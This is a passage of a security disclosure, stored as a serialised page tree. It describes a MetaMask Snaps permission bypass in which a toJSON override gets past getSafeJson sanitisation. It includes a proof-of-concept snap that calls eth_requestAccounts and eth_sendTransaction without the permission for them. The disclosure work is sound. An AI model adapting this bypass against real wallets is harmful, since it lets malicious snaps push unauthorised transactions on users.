'OutboundResponse'",{"type":24,"tag":301,"props":45719,"children":45720},{"style":359},[45721],{"type":30,"value":45574},{"type":24,"tag":301,"props":45723,"children":45724},{"class":303,"line":512},[45725],{"type":24,"tag":301,"props":45726,"children":45727},{"style":359},[45728],{"type":30,"value":19459},{"type":24,"tag":301,"props":45730,"children":45731},{"class":303,"line":592},[45732],{"type":24,"tag":301,"props":45733,"children":45734},{"style":359},[45735],{"type":30,"value":3085},{"type":24,"tag":32,"props":45737,"children":45738},{},[45739,45741,45746,45748,45753],{"type":30,"value":45740},"In particular, this function is from the ",{"type":24,"tag":145,"props":45742,"children":45744},{"className":45743},[],[45745],{"type":30,"value":44917},{"type":30,"value":45747}," provider, but the only thing that changes between this and ",{"type":24,"tag":145,"props":45749,"children":45751},{"className":45750},[],[45752],{"type":30,"value":38172},{"type":30,"value":45754}," is the assert function in the first line.",{"type":24,"tag":32,"props":45756,"children":45757},{},[45758],{"type":30,"value":45759},"As we can see in the code, the execution flow follows this pattern:",{"type":24,"tag":6246,"props":45761,"children":45762},{},[45763,45775,45780],{"type":24,"tag":2659,"props":45764,"children":45765},{},[45766,45768,45773],{"type":30,"value":45767},"Assert if ",{"type":24,"tag":145,"props":45769,"children":45771},{"className":45770},[],[45772],{"type":30,"value":44967},{"type":30,"value":45774}," are valid",{"type":24,"tag":2659,"props":45776,"children":45777},{},[45778],{"type":30,"value":45779},"getSafeJson to get sanitizedArgs",{"type":24,"tag":2659,"props":45781,"children":45782},{},[45783],{"type":30,"value":45784},"originalRequest(sanitizedArgs)",{"type":24,"tag":32,"props":45786,"children":45787},{},[45788,45790,45796],{"type":30,"value":45789},"Obs: ",{"type":24,"tag":145,"props":45791,"children":45793},{"className":45792},[],[45794],{"type":30,"value":45795},"originalRequest",{"type":30,"value":45797}," makes the RPC call to metamask service worker",{"type":24,"tag":80,"props":45799,"children":45801},{"id":45800},"safe-json-exploit",[45802],{"type":30,"value":45803},"Safe JSON Exploit",{"type":24,"tag":32,"props":45805,"children":45806},{},[45807,45809,45815,45817,45822,45824,45830],{"type":30,"value":45808},"As we dug further into the",{"type":24,"tag":145,"props":45810,"children":45812},{"className":45811},[],[45813],{"type":30,"value":45814},"getSafeJson",{"type":30,"value":45816}," function (defined in ",{"type":24,"tag":145,"props":45818,"children":45820},{"className":45819},[],[45821],{"type":30,"value":44036},{"type":30,"value":45823}," package) we discovered the following ",{"type":24,"tag":188,"props":45825,"children":45828},{"href":45826,"rel":45827},"https://github.com/MetaMask/utils/blob/7f0116d4d853d85319d200c503a2f9abc390f1d3/src/json.ts#L72",[192],[45829],{"type":30,"value":145},{"type":30,"value":1679},{"type":24,"tag":291,"props":45832,"children":45834},{"className":3185,"code":45833,"language":3184,"meta":7,"style":7},"export const JsonStruct = coerce(UnsafeJsonStruct, any(), (value) => {\n assertStruct(value, UnsafeJsonStruct);\n return JSON.parse(\n JSON.stringify(value, (propKey, propValue) => {\n // Strip __proto__ and constructor properties to prevent prototype pollution.\n if (propKey === '__proto__' || propKey === 'constructor') {\n return undefined;\n }\n return propValue;\n }),\n );\n});\n",[45835],{"type":24,"tag":145,"props":45836,"children":45837},{"__ignoreMap":7},[45838,45902,45929,45954,46009,46017,46063,46078,46085,46102,46109,46116],{"type":24,"tag":301,"props":45839,"children":45840},{"class":303,"line":304},[45841,45845,45850,45855,45859,45864,45868,45873,45877,45881,45886,45890,45894,45898],{"type":24,"tag":301,"props":45842,"children":45843},{"style":308},[45844],{"type":30,"value":44948},{"type":24,"tag":301,"props":45846,"children":45847},{"style":348},[45848],{"type":30,"value":45849}," const",{"type":24,"tag":301,"props":45851,"children":45852},{"style":369},[45853],{"type":30,"value":45854}," JsonStruct",{"type":24,"tag":301,"props":45856,"children":45857},{"style":385},[45858],{"type":30,"value":2537},{"type":24,"tag":301,"props":45860,"children":45861},{"style":314},[45862],{"type":30,"value":45863}," coerce",{"type":24,"tag":301,"props":45865,"children":45866},{"style":359},[45867],{"type":30,"value":362},{"type":24,"tag":301,"props":45869,"children":45870},{"style":369},[45871],{"type":30,"value":45872},"UnsafeJsonStruct",{"type":24,"tag":301,"props":45874,"children":45875},{"style":359},[45876],{"type":30,"value":377},{"type":24,"tag":301,"props":45878,"children":45879},{"style":314},[45880],{"type":30,"value":23494},{"type":24,"tag":301,"props":45882,"children":45883},{"style":359},[45884],{"type":30,"value":45885},"(), (",{"type":24,"tag":301,"props":45887,"children":45888},{"style":369},[45889],{"type":30,"value":5958},{"type":24,"tag":301,"props":45891,"children":45892},{"style":359},[45893],{"type":30,"value":911},{"type":24,"tag":301,"props":45895,"children":45896},{"style":348},[45897],{"type":30,"value":4841},{"type":24,"tag":301,"props":45899,"children":45900},{"style":359},[45901],{"type":30,"value":3035},{"type":24,"tag":301,"props":45903,"children":45904},{"class":303,"line":320},[45905,45909,45913,45917,45921,45925],{"type":24,"tag":301,"props":45906,"children":45907},{"style":314},[45908],{"type":30,"value":45299},{"type":24,"tag":301,"props":45910,"children":45911},{"style":359},[45912],{"type":30,"value":362},{"type":24,"tag":301,"props":45914,"children":45915},{"style":369},[45916],{"type":30,"value":5958},{"type":24,"tag":301,"props":45918,"children":45919},{"style":359},[45920],{"type":30,"value":377},{"type":24,"tag":301,"props":45922,"children":45923},{"style":369},[45924],{"type":30,"value":45872},{"type":24,"tag":301,"props":45926,"children":45927},{"style":359},[45928],{"type":30,"value":589},{"type":24,"tag":301,"props":45930,"children":45931},{"class":303,"line":335},[45932,45937,45941,45945,45950],{"type":24,"tag":301,"props":45933,"children":45934},{"style":308},[45935],{"type":30,"value":45936}," return",{"type":24,"tag":301,"props":45938,"children":45939},{"style":369},[45940],{"type":30,"value":44267},{"type":24,"tag":301,"props":45942,"children":45943},{"style":359},[45944],{"type":30,"value":206},{"type":24,"tag":301,"props":45946,"children":45947},{"style":314},[45948],{"type":30,"value":45949},"parse",{"type":24,"tag":301,"props":45951,"children":45952},{"style":359},[45953],{"type":30,"value":1707},{"type":24,"tag":301,"props":45955,"children":45956},{"class":303,"line":344},[45957,45962,45966,45971,45975,45979,45983,45988,45992,45997,46001,46005],{"type":24,"tag":301,"props":45958,"children":45959},{"style":369},[45960],{"type":30,"value":45961}," JSON",{"type":24,"tag":301,"props":45963,"children":45964},{"style":359},[45965],{"type":30,"value":206},{"type":24,"tag":301,"props":45967,"children":45968},{"style":314},[45969],{"type":30,"value":45970},"stringify",{"type":24,"tag":301,"props":45972,"children":45973},{"style":359},[45974],{"type":30,"value":362},{"type":24,"tag":301,"props":45976,"children":45977},{"style":369},[45978],{"type":30,"value":5958},{"type":24,"tag":301,"props":45980,"children":45981},{"style":359},[45982],{"type":30,"value":15631},{"type":24,"tag":301,"props":45984,"children":45985},{"style":369},[45986],{"type":30,"value":45987},"propKey",{"type":24,"tag":301,"props":45989,"children":45990},{"style":359},[45991],{"type":30,"value":377},{"type":24,"tag":301,"props":45993,"children":45994},{"style":369},[45995],{"type":30,"value":45996},"propValue",{"type":24,"tag":301,"props":45998,"children":45999},{"style":359},[46000],{"type":30,"value":911},{"type":24,"tag":301,"props":46002,"children":46003},{"style":348},[46004],{"type":30,"value":4841},{"type":24,"tag":301,"props":46006,"children":46007},{"style":359},[46008],{"type":30,"value":3035},{"type":24,"tag":301,"props":46010,"children":46011},{"class":303,"line":401},[46012],{"type":24,"tag":301,"props":46013,"children":46014},{"style":1062},[46015],{"type":30,"value":46016}," // Strip __proto__ and constructor properties to prevent prototype pollution.\n",{"type":24,"tag":301,"props":46018,"children":46019},{"class":303,"line":415},[46020,46024,46028,46032,46036,46041,46045,46050,46054,46059],{"type":24,"tag":301,"props":46021,"children":46022},{"style":308},[46023],{"type":30,"value":2476},{"type":24,"tag":301,"props":46025,"children":46026},{"style":359},[46027],{"type":30,"value":873},{"type":24,"tag":301,"props":46029,"children":46030},{"style":369},[46031],{"type":30,"value":45987},{"type":24,"tag":301,"props":46033,"children":46034},{"style":385},[46035],{"type":30,"value":38177},{"type":24,"tag":301,"props":46037,"children":46038},{"style":329},[46039],{"type":30,"value":46040}," '__proto__'",{"type":24,"tag":301,"props":46042,"children":46043},{"style":385},[46044],{"type":30,"value":3308},{"type":24,"tag":301,"props":46046,"children":46047},{"style":369},[46048],{"type":30,"value":46049}," propKey",{"type":24,"tag":301,"props":46051,"children":46052},{"style":385},[46053],{"type":30,"value":38177},{"type":24,"tag":301,"props":46055,"children":46056},{"style":329},[46057],{"type":30,"value":46058}," 'constructor'",{"type":24,"tag":301,"props":46060,"children":46061},{"style":359},[46062],{"type":30,"value":398},{"type":24,"tag":301,"props":46064,"children":46065},{"class":303,"line":439},[46066,46070,46074],{"type":24,"tag":301,"props":46067,"children":46068},{"style":308},[46069],{"type":30,"value":482},{"type":24,"tag":301,"props":46071,"children":46072},{"style":348},[46073],{"type":30,"value":3515},{"type":24,"tag":301,"props":46075,"children":46076},{"style":359},[46077],{"type":30,"value":492},{"type":24,"tag":301,"props":46079,"children":46080},{"class":303,"line":447},[46081],{"type":24,"tag":301,"props":46082,"children":46083},{"style":359},[46084],{"type":30,"value":19459},{"type":24,"tag":301,"props":46086,"children":46087},{"class":303,"line":476},[46088,46093,46098],{"type":24,"tag":301,"props":46089,"children":46090},{"style":308},[46091],{"type":30,"value":46092}," return",{"type":24,"tag":301,"props":46094,"children":46095},{"style":369},[46096],{"type":30,"value":46097}," propValue",{"type":24,"tag":301,"props":46099,"children":46100},{"style":359},[46101],{"type":30,"value":492},{"type":24,"tag":301,"props":46103,"children":46104},{"class":303,"line":495},[46105],{"type":24,"tag":301,"props":46106,"children":46107},{"style":359},[46108],{"type":30,"value":45284},{"type":24,"tag":301,"props":46110,"children":46111},{"class":303,"line":504},[46112],{"type":24,"tag":301,"props":46113,"children":46114},{"style":359},[46115],{"type":30,"value":45151},{"type":24,"tag":301,"props":46117,"children":46118},{"class":303,"line":512},[46119],{"type":24,"tag":301,"props":46120,"children":46121},{"style":359},[46122],{"type":30,"value":4868},{"type":24,"tag":32,"props":46124,"children":46125},{},[46126,46128,46134,46136,46141,46143,46149,46151,46157],{"type":30,"value":46127},"The function performs a ",{"type":24,"tag":145,"props":46129,"children":46131},{"className":46130},[],[46132],{"type":30,"value":46133},"JSON.parse(JSON.stringify(value))",{"type":30,"value":46135}," in the argument sent to ",{"type":24,"tag":145,"props":46137,"children":46139},{"className":46138},[],[46140],{"type":30,"value":45814},{"type":30,"value":46142},". This specific function is how we found a way to exploit the assertion limitations. The bypass is made by setting a ",{"type":24,"tag":145,"props":46144,"children":46146},{"className":46145},[],[46147],{"type":30,"value":46148},"toJSON",{"type":30,"value":46150}," function in a legit ",{"type":24,"tag":145,"props":46152,"children":46154},{"className":46153},[],[46155],{"type":30,"value":46156},"snap.request",{"type":30,"value":46158}," argument:",{"type":24,"tag":6246,"props":46160,"children":46161},{},[46162,46167,46172],{"type":24,"tag":2659,"props":46163,"children":46164},{},[46165],{"type":30,"value":46166},"assertSnapOutboundRequest(args) -> pass the assertion",{"type":24,"tag":2659,"props":46168,"children":46169},{},[46170],{"type":30,"value":46171},"sanitizedArgs = getSafeJson(args) -> toJSON returns a malicious object",{"type":24,"tag":2659,"props":46173,"children":46174},{},[46175],{"type":30,"value":46176},"originalRequest(sanitizedArgs) -> forwards the malicious object",{"type":24,"tag":32,"props":46178,"children":46179},{},[46180],{"type":30,"value":46181},"The assertion bypass can be useful on two occasions:",{"type":24,"tag":6246,"props":46183,"children":46184},{},[46185,46190],{"type":24,"tag":2659,"props":46186,"children":46187},{},[46188],{"type":30,"value":46189},"forward blocked RPC methods",{"type":24,"tag":2659,"props":46191,"children":46192},{},[46193,46195,46200,46202,46208,46210,46215],{"type":30,"value":46194},"Making requests in ",{"type":24,"tag":145,"props":46196,"children":46198},{"className":46197},[],[46199],{"type":30,"value":46156},{"type":30,"value":46201}," that were only supposed to be done within ",{"type":24,"tag":145,"props":46203,"children":46205},{"className":46204},[],[46206],{"type":30,"value":46207},"ethereum.request",{"type":30,"value":46209}," (with ",{"type":24,"tag":145,"props":46211,"children":46213},{"className":46212},[],[46214],{"type":30,"value":45388},{"type":30,"value":46216}," enabled).",{"type":24,"tag":32,"props":46218,"children":46219},{},[46220],{"type":30,"value":46221},"This particular vulnerability allows the snap to perform ethereum requests without permissions.",{"type":24,"tag":80,"props":46223,"children":46224},{"id":12482},[46225],{"type":30,"value":12485},{"type":24,"tag":32,"props":46227,"children":46228},{},[46229],{"type":30,"value":46230},"The bypass we described may be used to mislead the allowed permissions of the snap. This can cause the snap installation confirmation popup not to display the actual permissions of the snap. This exploit allows the snap to unexpectedly propose malicious transactions to the user, which shouldn't be possible, even with permissions according to the documentation.",{"type":24,"tag":32,"props":46232,"children":46233},{},[46234],{"type":24,"tag":177,"props":46235,"children":46237},{"alt":7,"src":46236},"/posts/metamask-snaps/note.png",[],{"type":24,"tag":80,"props":46239,"children":46241},{"id":46240},"proof-of-concept",[46242],{"type":30,"value":41577},{"type":24,"tag":32,"props":46244,"children":46245},{},[46246,46248,46253,46255,46260,46262,46268],{"type":30,"value":46247},"To demonstrate the issue, we created a snap without the ",{"type":24,"tag":145,"props":46249,"children":46251},{"className":46250},[],[46252],{"type":30,"value":45388},{"type":30,"value":46254}," permission, and used the ",{"type":24,"tag":145,"props":46256,"children":46258},{"className":46257},[],[46259],{"type":30,"value":44917},{"type":30,"value":46261}," interface to call ",{"type":24,"tag":145,"props":46263,"children":46265},{"className":46264},[],[46266],{"type":30,"value":46267},"eth_sendTransaction",{"type":30,"value":46269},". According to the documentation, this shouldn't be possible:",{"type":24,"tag":291,"props":46271,"children":46273},{"className":3185,"code":46272,"language":3184,"meta":7,"style":7},"import { OnRpcRequestHandler } from '@metamask/snaps-types';\n\n\nfunction jsonExploit(){\n let x = [] as any\n\n x.method = \"snap_dialog\"\n\n x.toJSON = () => {\n return {\n method: \"eth_requestAccounts\",\n params: []\n }\n }\n\n return snap.request(x)\n\n}\n\nfunction transactionExploit(){\n let x = [] as any\n\n x.method = \"snap_dialog\"\n\n x.toJSON = () => {\n return {\n method: \"eth_sendTransaction\",\n params: [{\n from: \"0xcf26B767586cC5fCF8737dD3FA57de164aF4248d\", // change this to your address\n to: \"0xcf26B767586cC5fCF8737dD3FA57de164aF4248d\",\n value: \"0x1\",\n }]\n }\n }\n\n return snap.request(x);\n}\n\nexport const onRpcRequest: OnRpcRequestHandler = ({ origin, request }) => {\n\n switch (request.method) {\n case 'json':\n return jsonExploit();\n case 'transaction':\n return transactionExploit();\n default:\n throw new Error('Method not found.');\n }\n};\n",[46274],{"type":24,"tag":145,"props":46275,"children":46276},{"__ignoreMap":7},[46277,46310,46317,46324,46341,46370,46377,46402,46409,46441,46452,46469,46482,46489,46496,46503,46535,46542,46549,46556,46572,46599,46606,46629,46636,46667,46678,46694,46706,46727,46742,46759,46767,46774,46781,46788,46819,46826,46833,46893,46900,46928,46945,46960,46976,46991,47003,47033,47040],{"type":24,"tag":301,"props":46278,"children":46279},{"class":303,"line":304},[46280,46284,46288,46293,46297,46301,46306],{"type":24,"tag":301,"props":46281,"children":46282},{"style":308},[46283],{"type":30,"value":26255},{"type":24,"tag":301,"props":46285,"children":46286},{"style":359},[46287],{"type":30,"value":16392},{"type":24,"tag":301,"props":46289,"children":46290},{"style":369},[46291],{"type":30,"value":46292},"OnRpcRequestHandler",{"type":24,"tag":301,"props":46294,"children":46295},{"style":359},[46296],{"type":30,"value":42945},{"type":24,"tag":301,"props":46298,"children":46299},{"style":308},[46300],{"type":30,"value":26245},{"type":24,"tag":301,"props":46302,"children":46303},{"style":329},[46304],{"type":30,"value":46305}," '@metamask/snaps-types'",{"type":24,"tag":301,"props":46307,"children":46308},{"style":359},[46309],{"type":30,"value":492},{"type":24,"tag":301,"props":46311,"children":46312},{"class":303,"line":320},[46313],{"type":24,"tag":301,"props":46314,"children":46315},{"emptyLinePlaceholder":16},[46316],{"type":30,"value":341},{"type":24,"tag":301,"props":46318,"children":46319},{"class":303,"line":335},[46320],{"type":24,"tag":301,"props":46321,"children":46322},{"emptyLinePlaceholder":16},[46323],{"type":30,"value":341},{"type":24,"tag":301,"props":46325,"children":46326},{"class":303,"line":344},[46327,46331,46336],{"type":24,"tag":301,"props":46328,"children":46329},{"style":348},[46330],{"type":30,"value":3205},{"type":24,"tag":301,"props":46332,"children":46333},{"style":314},[46334],{"type":30,"value":46335}," jsonExploit",{"type":24,"tag":301,"props":46337,"children":46338},{"style":359},[46339],{"type":30,"value":46340},"(){\n",{"type":24,"tag":301,"props":46342,"children":46343},{"class":303,"line":401},[46344,46348,46352,46356,46361,46365],{"type":24,"tag":301,"props":46345,"children":46346},{"style":348},[46347],{"type":30,"value":14671},{"type":24,"tag":301,"props":46349,"children":46350},{"style":369},[46351],{"type":30,"value":25840},{"type":24,"tag":301,"props":46353,"children":46354},{"style":385},[46355],{"type":30,"value":2537},{"type":24,"tag":301,"props":46357,"children":46358},{"style":359},[46359],{"type":30,"value":46360}," [] ",{"type":24,"tag":301,"props":46362,"children":46363},{"style":308},[46364],{"type":30,"value":15654},{"type":24,"tag":301,"props":46366,"children":46367},{"style":10246},[46368],{"type":30,"value":46369}," any\n",{"type":24,"tag":301,"props":46371,"children":46372},{"class":303,"line":415},[46373],{"type":24,"tag":301,"props":46374,"children":46375},{"emptyLinePlaceholder":16},[46376],{"type":30,"value":341},{"type":24,"tag":301,"props":46378,"children":46379},{"class":303,"line":439},[46380,46385,46389,46393,46397],{"type":24,"tag":301,"props":46381,"children":46382},{"style":369},[46383],{"type":30,"value":46384}," x",{"type":24,"tag":301,"props":46386,"children":46387},{"style":359},[46388],{"type":30,"value":206},{"type":24,"tag":301,"props":46390,"children":46391},{"style":369},[46392],{"type":30,"value":45052},{"type":24,"tag":301,"props":46394,"children":46395},{"style":385},[46396],{"type":30,"value":2537},{"type":24,"tag":301,"props":46398,"children":46399},{"style":329},[46400],{"type":30,"value":46401}," \"snap_dialog\"\n",{"type":24,"tag":301,"props":46403,"children":46404},{"class":303,"line":447},[46405],{"type":24,"tag":301,"props":46406,"children":46407},{"emptyLinePlaceholder":16},[46408],{"type":30,"value":341},{"type":24,"tag":301,"props":46410,"children":46411},{"class":303,"line":476},[46412,46416,46420,46424,46428,46433,46437],{"type":24,"tag":301,"props":46413,"children":46414},{"style":369},[46415],{"type":30,"value":46384},{"type":24,"tag":301,"props":46417,"children":46418},{"style":359},[46419],{"type":30,"value":206},{"type":24,"tag":301,"props":46421,"children":46422},{"style":314},[46423],{"type":30,"value":46148},{"type":24,"tag":301,"props":46425,"children":46426},{"style":385},[46427],{"type":30,"value":2537},{"type":24,"tag":301,"props":46429,"children":46430},{"style":359},[46431],{"type":30,"value":46432}," () ",{"type":24,"tag":301,"props":46434,"children":46435},{"style":348},[46436],{"type":30,"value":4841},{"type":24,"tag":301,"props":46438,"children":46439},{"style":359},[46440],{"type":30,"value":3035},{"type":24,"tag":301,"props":46442,"children":46443},{"class":303,"line":495},[46444,46448],{"type":24,"tag":301,"props":46445,"children":46446},{"style":308},[46447],{"type":30,"value":680},{"type":24,"tag":301,"props":46449,"children":46450},{"style":359},[46451],{"type":30,"value":3035},{"type":24,"tag":301,"props":46453,"children":46454},{"class":303,"line":504},[46455,46460,46465],{"type":24,"tag":301,"props":46456,"children":46457},{"style":369},[46458],{"type":30,"value":46459}," method:",{"type":24,"tag":301,"props":46461,"children":46462},{"style":329},[46463],{"type":30,"value":46464}," \"eth_requestAccounts\"",{"type":24,"tag":301,"props":46466,"children":46467},{"style":359},[46468],{"type":30,"value":1729},{"type":24,"tag":301,"props":46470,"children":46471},{"class":303,"line":512},[46472,46477],{"type":24,"tag":301,"props":46473,"children":46474},{"style":369},[46475],{"type":30,"value":46476}," params:",{"type":24,"tag":301,"props":46478,"children":46479},{"style":359},[46480],{"type":30,"value":46481}," []\n",{"type":24,"tag":301,"props":46483,"children":46484},{"class":303,"line":592},[46485],{"type":24,"tag":301,"props":46486,"children":46487},{"style":359},[46488],{"type":30,"value":501},{"type":24,"tag":301,"props":46490,"children":46491},{"class":303,"line":619},[46492],{"type":24,"tag":301,"props":46493,"children":46494},{"style":359},[46495],{"type":30,"value":6918},{"type":24,"tag":301,"props":46497,"children":46498},{"class":303,"line":635},[46499],{"type":24,"tag":301,"props":46500,"children":46501},{"emptyLinePlaceholder":16},[46502],{"type":30,"value":341},{"type":24,"tag":301,"props":46504,"children":46505},{"class":303,"line":643},[46506,46510,46515,46519,46523,46527,46531],{"type":24,"tag":301,"props":46507,"children":46508},{"style":308},[46509],{"type":30,"value":45936},{"type":24,"tag":301,"props":46511,"children":46512},{"style":369},[46513],{"type":30,"value":46514}," snap",{"type":24,"tag":301,"props":46516,"children":46517},{"style":359},[46518],{"type":30,"value":206},{"type":24,"tag":301,"props":46520,"children":46521},{"style":314},[46522],{"type":30,"value":38247},{"type":24,"tag":301,"props":46524,"children":46525},{"style":359},[46526],{"type":30,"value":362},{"type":24,"tag":301,"props":46528,"children":46529},{"style":369},[46530],{"type":30,"value":26050},{"type":24,"tag":301,"props":46532,"children":46533},{"style":359},[46534],{"type":30,"value":791},{"type":24,"tag":301,"props":46536,"children":46537},{"class":303,"line":652},[46538],{"type":24,"tag":301,"props":46539,"children":46540},{"emptyLinePlaceholder":16},[46541],{"type":30,"value":341},{"type":24,"tag":301,"props":46543,"children":46544},{"class":303,"line":666},[46545],{"type":24,"tag":301,"props":46546,"children":46547},{"style":359},[46548],{"type":30,"value":698},{"type":24,"tag":301,"props":46550,"children":46551},{"class":303,"line":674},[46552],{"type":24,"tag":301,"props":46553,"children":46554},{"emptyLinePlaceholder":16},[46555],{"type":30,"value":341},{"type":24,"tag":301,"props":46557,"children":46558},{"class":303,"line":692},[46559,46563,46568],{"type":24,"tag":301,"props":46560,"children":46561},{"style":348},[46562],{"type":30,"value":3205},{"type":24,"tag":301,"props":46564,"children":46565},{"style":314},[46566],{"type":30,"value":46567}," transactionExploit",{"type":24,"tag":301,"props":46569,"children":46570},{"style":359},[46571],{"type":30,"value":46340},{"type":24,"tag":301,"props":46573,"children":46574},{"class":303,"line":3631},[46575,46579,46583,46587,46591,46595],{"type":24,"tag":301,"props":46576,"children":46577},{"style":348},[46578],{"type":30,"value":14671},{"type":24,"tag":301,"props":46580,"children":46581},{"style":369},[46582],{"type":30,"value":25840},{"type":24,"tag":301,"props":46584,"children":46585},{"style":385},[46586],{"type":30,"value":2537},{"type":24,"tag":301,"props":46588,"children":46589},{"style":359},[46590],{"type":30,"value":46360},{"type":24,"tag":301,"props":46592,"children":46593},{"style":308},[46594],{"type":30,"value":15654},{"type":24,"tag":301,"props":46596,"children":46597},{"style":10246},[46598],{"type":30,"value":46369},{"type":24,"tag":301,"props":46600,"children":46601},{"class":303,"line":3639},[46602],{"type":24,"tag":301,"props":46603,"children":46604},{"emptyLinePlaceholder":16},[46605],{"type":30,"value":341},{"type":24,"tag":301,"props":46607,"children":46608},{"class":303,"line":3647},[46609,46613,46617,46621,46625],{"type":24,"tag":301,"props":46610,"children":46611},{"style":369},[46612],{"type":30,"value":46384},{"type":24,"tag":301,"props":46614,"children":46615},{"style":359},[46616],{"type":30,"value":206},{"type":24,"tag":301,"props":46618,"children":46619},{"style":369},[46620],{"type":30,"value":45052},{"type":24,"tag":301,"props":46622,"children":46623},{"style":385},[46624],{"type":30,"value":2537},{"type":24,"tag":301,"props":46626,"children":46627},{"style":329},[46628],{"type":30,"value":46401},{"type":24,"tag":301,"props":46630,"children":46631},{"class":303,"line":3685},[46632],{"type":24,"tag":301,"props":46633,"children":46634},{"emptyLinePlaceholder":16},[46635],{"type":30,"value":341},{"type":24,"tag":301,"props":46637,"children":46638},{"class":303,"line":3713},[46639,46643,46647,46651,46655,46659,46663],{"type":24,"tag":301,"props":46640,"children":46641},{"style":369},[46642],{"type":30,"value":46384},{"type":24,"tag":301,"props":46644,"children":46645},{"style":359},[46646],{"type":30,"value":206},{"type":24,"tag":301,"props":46648,"children":46649},{"style":314},[46650],{"type":30,"value":46148},{"type":24,"tag":301,"props":46652,"children":46653},{"style":385},[46654],{"type":30,"value":2537},{"type":24,"tag":301,"props":46656,"children":46657},{"style":359},[46658],{"type":30,"value":46432},{"type":24,"tag":301,"props":46660,"children":46661},{"style":348},[46662],{"type":30,"value":4841},{"type":24,"tag":301,"props":46664,"children":46665},{"style":359},[46666],{"type":30,"value":3035},{"type":24,"tag":301,"props":46668,"children":46669},{"class":303,"line":3721},[46670,46674],{"type":24,"tag":301,"props":46671,"children":46672},{"style":308},[46673],{"type":30,"value":680},{"type":24,"tag":301,"props":46675,"children":46676},{"style":359},[46677],{"type":30,"value":3035},{"type":24,"tag":301,"props":46679,"children":46680},{"class":303,"line":3751},[46681,46685,46690],{"type":24,"tag":301,"props":46682,"children":46683},{"style":369},[46684],{"type":30,"value":46459},{"type":24,"tag":301,"props":46686,"children":46687},{"style":329},[46688],{"type":30,"value":46689}," \"eth_sendTransaction\"",{"type":24,"tag":301,"props":46691,"children":46692},{"style":359},[46693],{"type":30,"value":1729},{"type":24,"tag":301,"props":46695,"children":46696},{"class":303,"line":3782},[46697,46701],{"type":24,"tag":301,"props":46698,"children":46699},{"style":369},[46700],{"type":30,"value":46476},{"type":24,"tag":301,"props":46702,"children":46703},{"style":359},[46704],{"type":30,"value":46705}," [{\n",{"type":24,"tag":301,"props":46707,"children":46708},{"class":303,"line":3791},[46709,46713,46718,46722],{"type":24,"tag":301,"props":46710,"children":46711},{"style":369},[46712],{"type":30,"value":38817},{"type":24,"tag":301,"props":46714,"children":46715},{"style":329},[46716],{"type":30,"value":46717}," \"0xcf26B767586cC5fCF8737dD3FA57de164aF4248d\"",{"type":24,"tag":301,"props":46719,"children":46720},{"style":359},[46721],{"type":30,"value":377},{"type":24,"tag":301,"props":46723,"children":46724},{"style":1062},[46725],{"type":30,"value":46726},"// change this to your address\n",{"type":24,"tag":301,"props":46728,"children":46729},{"class":303,"line":3819},[46730,46734,46738],{"type":24,"tag":301,"props":46731,"children":46732},{"style":369},[46733],{"type":30,"value":38833},{"type":24,"tag":301,"props":46735,"children":46736},{"style":329},[46737],{"type":30,"value":46717},{"type":24,"tag":301,"props":46739,"children":46740},{"style":359},[46741],{"type":30,"value":1729},{"type":24,"tag":301,"props":46743,"children":46744},{"class":303,"line":4397},[46745,46750,46755],{"type":24,"tag":301,"props":46746,"children":46747},{"style":369},[46748],{"type":30,"value":46749}," value:",{"type":24,"tag":301,"props":46751,"children":46752},{"style":329},[46753],{"type":30,"value":46754}," \"0x1\"",{"type":24,"tag":301,"props":46756,"children":46757},{"style":359},[46758],{"type":30,"value":1729},{"type":24,"tag":301,"props":46760,"children":46761},{"class":303,"line":4405},[46762],{"type":24,"tag":301,"props":46763,"children":46764},{"style":359},[46765],{"type":30,"value":46766}," }]\n",{"type":24,"tag":301,"props":46768,"children":46769},{"class":303,"line":4422},[46770],{"type":24,"tag":301,"props":46771,"children":46772},{"style":359},[46773],{"type":30,"value":501},{"type":24,"tag":301,"props":46775,"children":46776},{"class":303,"line":4438},[46777],{"type":24,"tag":301,"props":46778,"children":46779},{"style":359},[46780],{"type":30,"value":6918},{"type":24,"tag":301,"props":46782,"children":46783},{"class":303,"line":4446},[46784],{"type":24,"tag":301,"props":46785,"children":46786},{"emptyLinePlaceholder":16},[46787],{"type":30,"value":341},{"type":24,"tag":301,"props":46789,"children":46790},{"class":303,"line":4506},[46791,46795,46799,46803,46807,46811,46815],{"type":24,"tag":301,"props":46792,"children":46793},{"style":308},[46794],{"type":30,"value":45936},{"type":24,"tag":301,"props":46796,"children":46797},{"style":369},[46798],{"type":30,"value":46514},{"type":24,"tag":301,"props":46800,"children":46801},{"style":359},[46802],{"type":30,"value":206},{"type":24,"tag":301,"props":46804,"children":46805},{"style":314},[46806],{"type":30,"value":38247},{"type":24,"tag":301,"props":46808,"children":46809},{"style":359},[46810],{"type":30,"value":362},{"type":24,"tag":301,"props":46812,"children":46813},{"style":369},[46814],{"type":30,"value":26050},{"type":24,"tag":301,"props":46816,"children":46817},{"style":359},[46818],{"type":30,"value":589},{"type":24,"tag":301,"props":46820,"children":46821},{"class":303,"line":4566},[46822],{"type":24,"tag":301,"props":46823,"children":46824},{"style":359},[46825],{"type":30,"value":698},{"type":24,"tag":301,"props":46827,"children":46828},{"class":303,"line":4574},[46829],{"type":24,"tag":301,"props":46830,"children":46831},{"emptyLinePlaceholder":16},[46832],{"type":30,"value":341},{"type":24,"tag":301,"props":46834,"children":46835},{"class":303,"line":4590},[46836,46840,46844,46849,46853,46858,46862,46867,46872,46876,46880,46885,46889],{"type":24,"tag":301,"props":46837,"children":46838},{"style":308},[46839],{"type":30,"value":44948},{"type":24,"tag":301,"props":46841,"children":46842},{"style":348},[46843],{"type":30,"value":45849},{"type":24,"tag":301,"props":46845,"children":46846},{"style":314},[46847],{"type":30,"value":46848}," onRpcRequest",{"type":24,"tag":301,"props":46850,"children":46851},{"style":385},[46852],{"type":30,"value":1679},{"type":24,"tag":301,"props":46854,"children":46855},{"style":10246},[46856],{"type":30,"value":46857}," OnRpcRequestHandler",{"type":24,"tag":301,"props":46859,"children":46860},{"style":385},[46861],{"type":30,"value":2537},{"type":24,"tag":301,"props":46863,"children":46864},{"style":359},[46865],{"type":30,"value":46866}," ({ ",{"type":24,"tag":301,"props":46868,"children":46869},{"style":369},[46870],{"type":30,"value":46871},"origin",{"type":24,"tag":301,"props":46873,"children":46874},{"style":359},[46875],{"type":30,"value":377},{"type":24,"tag":301,"props":46877,"children":46878},{"style":369},[46879],{"type":30,"value":38247},{"type":24,"tag":301,"props":46881,"children":46882},{"style":359},[46883],{"type":30,"value":46884}," }) 